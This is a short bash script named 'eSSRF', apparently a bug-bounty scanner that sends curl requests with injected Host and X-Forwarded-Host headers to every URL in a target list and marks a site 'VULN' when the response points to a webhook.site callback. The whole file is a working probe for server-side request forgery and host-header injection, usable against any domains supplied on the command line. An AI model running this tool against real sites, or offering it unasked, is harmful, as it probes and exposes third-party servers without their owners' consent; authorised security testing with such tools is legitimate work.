#!/bin/bash
clear
echo -e "\033[32;1m====================================="
figlet eSSRF
echo -e "====================================="
echo -e "\033[32;1meSS\033[33;1mR\033[34;1mF \033[37;1m| \033[32;1mpaktiko1986\033[0m"
echo -e "\033[32;1m====================================="
echo "[+] Total target(s): " $(cat $2 | wc -l)
echo "[+] Payloads: "
echo "    >> Host: $3"
echo "    >> X-Forwarded-Host: $3"
echo "    >> Token: $4"
echo "    >> Content-Length: 0"
echo "    >> X-Bug-Bounty: HackerOne-0x071c0"
echo "    >> X-BugCrowdNinja: SantikoKusnulHakim"
echo -e "=====================================\033[0m"
touch ssrf_vulns.txt
if [[ ! $1 == "--d" && $2 == "" ]]; then
	echo "--d: fill with URL target (single domain or subdomain list in file)"
	echo "Example: --d google.com | --d subdomain.txt"
else
	for url in $(cat $2); do curl --max-time 9 -skLI -X GET $4 -H "X-Bug-Bounty: HackerOne-0x071c0" -H "X-BugCrowdNinja: SantikoKusnulHakim" -H "Host: $3" -H "X-Forwarded-Host: $3" -H "Content-Length:0" -A "User-Agent: SKH86" $url | grep -q "domain=.webhook.site" && echo -e "\033[31;1m[-] $url is VULN\033[0m" >> ssrf_vulns.txt || echo -e "\033[32m[+] $url is WELL\033[0m";  done
fi
#cat hhi_vulns.txt | awk -F"//" '{print $2}' | awk -F" " '{print $1}' | tee -a originUrl; cat originUrl | xargs getent hosts | sort -u | tee -a iplooks
echo ""
echo -e "\033[32;1m==========================================================\033[0m"
cat ssrf_vulns.txt
echo -e "\033[32;1m==========================================================\033[0m"
echo -e "\033[33mTotal vuln site by \033[32;1meSS\033[33;1mR\033[34;1mF\033[0m =\033[33;1m $(cat ssrf_vulns.txt | wc -l)\033[0m"
echo -e "\033[32;1m==========================================================\033[0m"
echo ""
